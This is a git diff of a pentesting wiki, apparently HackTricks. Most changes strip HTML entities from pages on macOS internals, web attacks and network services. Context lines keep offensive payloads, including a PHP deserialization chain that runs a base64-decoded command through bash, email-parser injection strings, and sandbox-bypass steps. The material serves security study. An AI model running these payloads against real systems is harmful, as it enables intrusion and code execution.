$x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address<br>memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #Disas current function</p><p>dis -n <funcname> #Disas func</p><p>dis -n <funcname> -b <basename> #Disas func<br>dis -c 6 #Disas 6 lines<br>dis -c 0x100003764 -e 0x100003768 # From one add until the other<br>dis -p -c 4 # Start in current address disassembling</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # Check array of 3 components in x1 reg</td></tr><tr><td><strong>image dump sections</strong></td><td>Print map of the current process memory</td></tr><tr><td><strong>image dump symtab <library></strong></td><td><code>image dump symtab CoreNLP</code> #Get the address of all the symbols from CoreNLP</td></tr></tbody></table>
> [!NOTE]
> When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated (“C”) string. To print the name via lldb do:

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
View File

@ -14,7 +14,7 @@
## Keyloggers detection
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"&#x20;
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"
{{#include ../../banners/hacktricks-training.md}}

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
View File

@ -18,7 +18,7 @@ This is very helpful to manage parallel execution successfully, greatly reducing
A block is a **self contained section of code** (like a function with arguments returning a value) and can also specify bound variables.\
However, at compiler level blocks doesn't exist, they are `os_object`s. Each of these objects is formed by two structures:
- **block literal**:&#x20;
- **block literal**:
- It starts by the **`isa`** field, pointing to the block's class:
- `NSConcreteGlobalBlock` (blocks from `__DATA.__const`)
- `NSConcreteMallocBlock` (blocks in the heap)

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
View File

@ -51,7 +51,7 @@ Using some **social engineering** you could **impersonate for example Google Chr
{{#tab name="Chrome Impersonation"}}
Some suggestions:
- Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array.&#x20;
- Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array.
```bash
#!/bin/sh

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
View File

@ -52,7 +52,7 @@ The main Nib file is referenced in the value **`NSMainNibFile`** inside the `Inf
### Other Example
In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find tutorial on how to create a dirty nib.&#x20;
In the post [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) you can find tutorial on how to create a dirty nib.
### Addressing Launch Constraints

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
View File

@ -192,10 +192,10 @@ Process 71019 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
-> 0x181d3ac20 &#x3C;+0>: pacibsp
0x181d3ac24 &#x3C;+4>: sub sp, sp, #0x20
0x181d3ac28 &#x3C;+8>: stp x29, x30, [sp, #0x10]
0x181d3ac2c &#x3C;+12>: add x29, sp, #0x10
-> 0x181d3ac20 <+0>: pacibsp
0x181d3ac24 <+4>: sub sp, sp, #0x20
0x181d3ac28 <+8>: stp x29, x30, [sp, #0x10]
0x181d3ac2c <+12>: add x29, sp, #0x10
Target 0: (SandboxedShellApp) stopped.
<strong>(lldb) bt
</strong>* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
@ -208,7 +208,7 @@ Target 0: (SandboxedShellApp) stopped.
frame #6: 0x0000000181abbbfc libxpc.dylib`_xpc_early_init + 92
frame #7: 0x0000000181a9583c libxpc.dylib`_libxpc_initializer + 1104
frame #8: 0x000000018e59e6ac libSystem.B.dylib`libSystem_initializer + 236
frame #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&#x26;) const::$_0::operator()() const + 168
frame #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&) const::$_0::operator()() const + 168
</code></pre>
To get the arguments of **`mach_msg`** check the registers. These are the arguments (from [mach/message.h](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)):

22
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -150,7 +150,7 @@ Finally, another important function to make the server work will be **`myipc_ser
OutHeadP->msgh_id = InHeadP->msgh_id + 100;
OutHeadP->msgh_reserved = 0;
if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id &#x3C; 500) ||
if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id < 500) ||
<strong> ((routine = SERVERPREFmyipc_subsystem.routine[InHeadP->msgh_id - 500].stub_routine) == 0)) {
</strong> ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;
((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;
@ -270,13 +270,13 @@ It was previously mentioned that the function that will take care of **calling t
var_10 = arg0;
var_18 = arg1;
// Initial instructions to find the proper function ponters
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f;
*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
*(int32_t *)(var_18 + 0xc) = 0x0;
*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;
*(int32_t *)(var_18 + 0x10) = 0x0;
if (*(int32_t *)(var_10 + 0x14) &#x3C;= 0x1f4 &#x26;&#x26; *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
if (*(int32_t *)(var_10 + 0x14) <= 0x1f4 && *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
rax = *(int32_t *)(var_10 + 0x14);
// Call to sign_extend_64 that can help to identifyf this function
// This stores in rax the pointer to the call that needs to be called
@ -318,7 +318,7 @@ This is the same function decompiled in a difefrent Hopper free version:
var_10 = arg0;
var_18 = arg1;
// Initial instructions to find the proper function ponters
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f | 0x0;
*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f | 0x0;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
*(int32_t *)(var_18 + 0xc) = 0x0;
@ -327,19 +327,19 @@ This is the same function decompiled in a difefrent Hopper free version:
r8 = *(int32_t *)(var_10 + 0x14);
r8 = r8 - 0x1f4;
if (r8 > 0x0) {
if (CPU_FLAGS &#x26; G) {
if (CPU_FLAGS & G) {
r8 = 0x1;
}
}
if ((r8 &#x26; 0x1) == 0x0) {
if ((r8 & 0x1) == 0x0) {
r8 = *(int32_t *)(var_10 + 0x14);
r8 = r8 - 0x1f4;
if (r8 &#x3C; 0x0) {
if (CPU_FLAGS &#x26; L) {
if (r8 < 0x0) {
if (CPU_FLAGS & L) {
r8 = 0x1;
}
}
if ((r8 &#x26; 0x1) == 0x0) {
if ((r8 & 0x1) == 0x0) {
r8 = *(int32_t *)(var_10 + 0x14);
// 0x1f4 = 500 (the strating ID)
<strong> r8 = r8 - 0x1f4;
@ -348,13 +348,13 @@ This is the same function decompiled in a difefrent Hopper free version:
var_20 = r8;
r8 = r8 - 0x0;
if (r8 != 0x0) {
if (CPU_FLAGS &#x26; NE) {
if (CPU_FLAGS & NE) {
r8 = 0x1;
}
}
// Same if else as in the previous version
// Check the used of the address 0x100004040 (functions addresses array)
<strong> if ((r8 &#x26; 0x1) == 0x0) {
<strong> if ((r8 & 0x1) == 0x0) {
</strong><strong> *(var_18 + 0x18) = **0x100004000;
</strong> *(int32_t *)(var_18 + 0x20) = 0xfffffed1;
var_4 = 0x0;

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
View File

@ -28,7 +28,7 @@ Then, it maps the dyld shared cache which prelinks all the important system libr
1. it start loading inserted libraries with `DYLD_INSERT_LIBRARIES` (if allowed)
2. Then the shared cached ones
3. Then the imported ones
1. &#x20;Then continue importing libraries recursively
1. Then continue importing libraries recursively
Once all are loaded the **initialisers** of these libraries are run. These are coded using **`__attribute__((constructor))`** defined in the `LC_ROUTINES[_64]` (now deprecated) or by pointer in a section flagged with `S_MOD_INIT_FUNC_POINTERS` (usually: **`__DATA.__MOD_INIT_FUNC`**).

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
View File

@ -36,8 +36,8 @@ These are some of the MACF policies it registers:
- **`vnode_check_exec`**: Gets called when a executable files are loaded in memory and sets `cs_hard | cs_kill` which will kill the process if any of the pages becomes invalid
- **`vnode_check_getextattr`**: MacOS: Check `com.apple.root.installed` and `isVnodeQuarantined()`
- **`vnode_check_setextattr`**: As get + com.apple.private.allow-bless and internal-installer-equivalent entitlement
- &#x20;**`vnode_check_signature`**: Code that calls XNU to check the code signature using entitlements, trust cache and `amfid`
- &#x20;**`proc_check_run_cs_invalid`**: It intercepts `ptrace()` calls (`PT_ATTACH` and `PT_TRACE_ME`). It checks for any of the entitlements `get-task-allow`, `run-invalid-allow` and `run-unsigned-code` and if none, it checks if debugging is permitted.
- **`vnode_check_signature`**: Code that calls XNU to check the code signature using entitlements, trust cache and `amfid`
- **`proc_check_run_cs_invalid`**: It intercepts `ptrace()` calls (`PT_ATTACH` and `PT_TRACE_ME`). It checks for any of the entitlements `get-task-allow`, `run-invalid-allow` and `run-unsigned-code` and if none, it checks if debugging is permitted.
- **`proc_check_map_anon`**: If mmap is called with the **`MAP_JIT`** flag, AMFI will checks for the `dynamic-codesigning` entitlement.
`AMFI.kext` also exposes an API for other kernel extensions, and it's possible to find its dependencies with:

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
View File

@ -26,7 +26,7 @@ MACF use **labels** that then the policies checking if they should grant some ac
## MACF Policies
A MACF Policy defined **rule and conditions to be applied in certain kernel operations**.&#x20;
A MACF Policy defined **rule and conditions to be applied in certain kernel operations**.
A kernel extension could configure a `mac_policy_conf` struct and then register it calling `mac_policy_register`. From [here](https://opensource.apple.com/source/xnu/xnu-2050.18.24/security/mac_policy.h.auto.html):
@ -115,7 +115,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval)
#if CONFIG_MACF
<strong> error = mac_file_check_mmap(vfs_context_ucred(ctx),
</strong> fp->fp_glob, prot, flags, file_pos + pageoff,
&#x26;maxprot);
&maxprot);
if (error) {
(void)vnode_put(vp);
goto bad;

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
View File

@ -44,7 +44,7 @@ Check the [**original report here**](https://perception-point.io/blog/technical-
The **`open`** utility also supported the **`--stdin`** param (and after the previous bypass it was no longer possible to use `--env`).
The thing is that even if **`python`** was signed by Apple, it **won't execute** a script with the **`quarantine`** attribute. However, it was possible to pass it a script from stdin so it won't check if it was quarantined or not:&#x20;
The thing is that even if **`python`** was signed by Apple, it **won't execute** a script with the **`quarantine`** attribute. However, it was possible to pass it a script from stdin so it won't check if it was quarantined or not:
1. Drop a **`~$exploit.py`** file with arbitrary Python commands.
2. Run _open_ **`stdin='~$exploit.py' -a Python`**, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since its a child process of _launchd_, it isnt bound to Words sandbox rules.

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View File

@ -230,7 +230,7 @@ The command **`diskutil apfs list`** lists the **details of the APFS volumes** a
| Capacity In Use By Volumes: 219214536704 B (219.2 GB) (44.3% used)
| Capacity Not Allocated: 275170258944 B (275.2 GB) (55.7% free)
| |
| +-&#x3C; Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE
| +-< Physical Store disk0s2 86D4B7EC-6FA5-4042-93A7-D3766A222EBE
| | -----------------------------------------------------------
| | APFS Physical Store Disk: disk0s2
| | Size: 494384795648 B (494.4 GB)

2
src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
View File

@ -70,7 +70,7 @@ Opened URL: iGoat://?contactNumber=0&message=0
## Custom URL scheme hijacking
According to [**this post**](https://evanconnelly.github.io/post/ios-oauth/), malicious apps could **register other apps custom schemes,** then the malicious app can open a browser that has all the cookies of the Safari App with [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
According to [**this post**](https://evanconnelly.github.io/post/ios-oauth/), malicious apps could **register other apps custom schemes,** then the malicious app can open a browser that has all the cookies of the Safari App with [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).
With the broser the malicious app can load an attackers controlled web page and TCC will ask the mobile user for permissions to open that app. Then, the malicious webpage could redirect to a victim page, for example an OAuth flow with the parameter `prompt=none`. If the user was already logged in the OAuth flow, the OAuth flow will send the secret back to the victim application using the custom scheme of the victim app.\
However, because the malicious app also registered it and because the used browser is inside the malicious app, the custom scheme will be handled in this case by the malicious app which will be able to steal the OAuth token.

2
src/network-services-pentesting/11211-memcache/memcache-commands.md
View File

@ -14,7 +14,7 @@ Sadly the syntax description isnt really clear and a simple help command list
| Command | Description | Example |
| -------------------- | --------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------- |
| get | Reads a value | `get mykey` |
| set | Set a key unconditionally | <p><code>set mykey &#x3C;flags> &#x3C;ttl> &#x3C;size></code><br><br>&#x3C;p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example&#x3C;/p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| set | Set a key unconditionally | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Ensure to use \r\n als line breaks when using Unix CLI tools. For example</p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
| add | Add a new key | `add newkey 0 60 5` |
| replace | Overwrite existing key | `replace key 0 60 5` |
| append | Append data to existing key | `append key 0 60 15` |

2
src/network-services-pentesting/nfs-service-pentesting.md
View File

@ -10,7 +10,7 @@ A notable aspect of this protocol is its lack of built-in **authentication** or
Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Consequently, the protocol is best suited for use within **trusted networks**, given its reliance on this method of authentication.
**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).&#x20;
**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).
```
2049/tcp open nfs 2-3 (RPC #100003

2
src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
View File

@ -39,7 +39,7 @@ Then access to **`/Portals/0/shell.asp`** to access your webshell.
### Privilege Escalation
You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.&#x20;
You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.
{{#include ../../banners/hacktricks-training.md}}

2
src/network-services-pentesting/pentesting-web/jira.md
View File

@ -98,7 +98,7 @@ public class helloworld implements Macro {
}
```
It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user.&#x20;
It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user.
Once a XSS is found, in [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) you can find some payloads to increase the impact of the XSS.

2
src/network-services-pentesting/pentesting-web/nginx.md
View File

@ -79,7 +79,7 @@ location = /admin/ {
>
> A regex can also be vulnerable like:
>
> `location ~ /docs/([^/])? { … $1 … }` - Vulnerable&#x20;
> `location ~ /docs/([^/])? { … $1 … }` - Vulnerable
>
> `location ~ /docs/([^/\s])? { … $1 … }` - Not vulnerable (checking spaces)
>

2
src/network-services-pentesting/pentesting-web/wordpress.md
View File

@ -370,7 +370,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
Knowing how a Wordpress plugin can expose functionality is key in order to find vulnerabilities on its functionality. You can find how a plugin might expose functionality in the following bullet points and some example of vulnerable plugins in [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
- **`wp_ajax`**&#x20;
- **`wp_ajax`**
One of the ways a plugin can expose functions to uses if via AJAX handlers. These ones could contain logic, authorization, or authentication bugs. Moreover, it's kind of frquelty that these functions are going to base both the authentication and authorization in the existence of a wordpress nonce which **any user authenticated in the Wordpress instance might have** (independently of its role).

2
src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
View File

@ -29,7 +29,7 @@ Other specific delimiters might be found following this process:
### **Encodings**
Different HTTP servers and proxies like Nginx, Node, and CloudFront decode delimiters differently, leading to inconsistencies across CDNs and origin servers that could be exploited. For example, if the web server perform this transformation `/myAccount%3Fparam``/myAccount?param` but the cache server keeps as key the path `/myAccount%3Fparam`, there is an inconsistency.&#x20;
Different HTTP servers and proxies like Nginx, Node, and CloudFront decode delimiters differently, leading to inconsistencies across CDNs and origin servers that could be exploited. For example, if the web server perform this transformation `/myAccount%3Fparam``/myAccount?param` but the cache server keeps as key the path `/myAccount%3Fparam`, there is an inconsistency.
A way to check for these inconsistencies is to send requests URL encoding different chars after loading the path without any encoding and check if the encoded path response came from the cached response.

4
src/pentesting-web/clickjacking.md
View File

@ -97,8 +97,8 @@ background: #F00;
If you have identified an **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\
Example:\
_&#x59;ou found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters._\
\_\_An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**.
You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters.\
An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**.
## Strategies to Mitigate Clickjacking

4
src/pentesting-web/crlf-0d-0a.md
View File

@ -161,11 +161,11 @@ If a platform is taking **data from an HTTP request and using it without sanitiz
For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers:
<figure><img src="../images/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
<figure><img src="../images/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop"><figcaption></figcaption></figure>
Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know:
<figure><img src="../images/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
<figure><img src="../images/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop"><figcaption></figcaption></figure>
### How to Prevent CRLF / HTTP Header Injections in Web Applications

2
src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
View File

@ -52,7 +52,7 @@ In my case, I didnt have anything like that, but there was inside the **same
a:2:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}}
```
- Now, we can **create and write a file**, however, the user **couldnt write in any folder inside the web server**. So, as you can see in the payload, PHP calling **`system`** with some **base64** is created in **`/tmp/a.php`**. Then, we can **reuse the first type of payload** that we used to as LFI to load the composer loader of the other webapp t**o load the generated `/tmp/a.php`** file. Just add it to the deserialization gadget:&#x20;
- Now, we can **create and write a file**, however, the user **couldnt write in any folder inside the web server**. So, as you can see in the payload, PHP calling **`system`** with some **base64** is created in **`/tmp/a.php`**. Then, we can **reuse the first type of payload** that we used to as LFI to load the composer loader of the other webapp t**o load the generated `/tmp/a.php`** file. Just add it to the deserialization gadget:
```php
a:3:{s:5:"Extra";O:28:"www_frontend_vendor_autoload":0:{}s:6:"Extra2";O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:4:"data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:56:"<?php system('echo L3JlYWRmbGFn | base64 -d | bash'); ?>";}}}s:10:"strictMode";N;s:8:"filename";s:10:"/tmp/a.php";s:19:"storeSessionCookies";b:1;}s:6:"Extra3";O:5:"tmp_a":0:{}}

2
src/pentesting-web/deserialization/ruby-class-pollution.md
View File

@ -154,7 +154,7 @@ JSONMergerApp.run(json_input)
### ActiveSupports `deep_merge`
This isn't vulnerable by default but can be made vulnerable with something like:&#x20;
This isn't vulnerable by default but can be made vulnerable with something like:
```ruby
# Method to merge additional data into the object using ActiveSupport deep_merge

8
src/pentesting-web/email-injections.md
View File

@ -91,11 +91,11 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
### Whitelist bypass
<figure><img src="../images/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (812).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### Quotes
<figure><img src="../images/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (626).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
### IPs
@ -149,7 +149,7 @@ x@xn--svg/-9x6 → x@<svg/
Payloads:
- Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
- Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`&#x20;
- Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`
- It'll send the verification email to `collab@psres.net`
- Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
- Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
@ -177,7 +177,7 @@ Some services like **github** or **salesforce allows** you to create an **email
### Account-Takeover
If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
_&#x4E;ote that salesforce indicates if the given email was or not verified but so the application should take into account this info._
_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
## Reply-To

2
src/pentesting-web/file-inclusion/README.md
View File

@ -681,7 +681,7 @@ lfi2rce-via-eternal-waiting.md
If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (You need to include the same one 2 time to throw that error).
**I don't know how is this useful but it might be.**\
_&#x45;ven if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
_Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>

2
src/pentesting-web/hacking-with-cookies/README.md
View File

@ -206,7 +206,7 @@ In the RFC2109 it's indicated that a **comma can be used as a separator between
#### Bypassing value analysis with cookie splitting
Finally different backdoors would join in a string different cookies passed in different cookie headers like in:&#x20;
Finally different backdoors would join in a string different cookies passed in different cookie headers like in:
```
GET / HTTP/1.1

4
src/pentesting-web/orm-injection.md
View File

@ -207,9 +207,9 @@ await prisma.article.findMany({
```
> [!CAUTION]
> Using operations like `startsWith` it's possible to leak information.&#x20;
> Using operations like `startsWith` it's possible to leak information.
- **Many-to-many relational filtering bypassing filtering:**&#x20;
- **Many-to-many relational filtering bypassing filtering:**
```javascript
app.post("/articles", async (req, res) => {

6
src/pentesting-web/phone-number-injections.md
View File

@ -4,13 +4,13 @@
It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
<figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (941).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
**OTP Bypass / Bruteforce** would work like this:
<figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
<figure><img src="../images/image (116).png" alt="https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
## References

2
src/pentesting-web/race-condition.md
View File

@ -225,7 +225,7 @@ while "objetivo" not in response.text:
### Improving Single Packet Attack
In the original research it's explained that this attack has a limit of 1,500 bytes. However, in [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), it was explained how it's possible to extend the 1,500-byte limitation of the single packet attack to the **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) and sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server. This technique allowed the researcher to send 10,000 requests in about 166ms.&#x20;
In the original research it's explained that this attack has a limit of 1,500 bytes. However, in [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), it was explained how it's possible to extend the 1,500-byte limitation of the single packet attack to the **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) and sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server. This technique allowed the researcher to send 10,000 requests in about 166ms.
Note that although this improvement makes the attack more reliable in RC that requiers hundreds/thousands of packets to arrive at the same time, it might also have some software limitations. Some popular HTTP servers like Apache, Nginx and Go have a strict `SETTINGS_MAX_CONCURRENT_STREAMS` setting to 100, 128 and 250. However, other like NodeJS and nghttp2 has it unlimited.\
This basically mean that Apache will only consider 100 HTTP connections from a single TCP connection (limiting this RC attack).

2
src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View File

@ -17,7 +17,7 @@ And, when the page is served, this fragment will be evaluated and replaced with
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution.
You can infer the presence of SSI if the web application uses files with the extension&#x73;**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.
You can infer the presence of SSI if the web application uses files with the extensions**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.
A typical SSI expression has the following format:

2
src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
View File

@ -21,7 +21,7 @@ local all all trust
```
_Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it._\
_&#x4E;ote also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
_Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user._
This case is **useful if** you **already** have a **shell** inside the victim as it will allow you to connect to postgresql database.

2
src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
View File

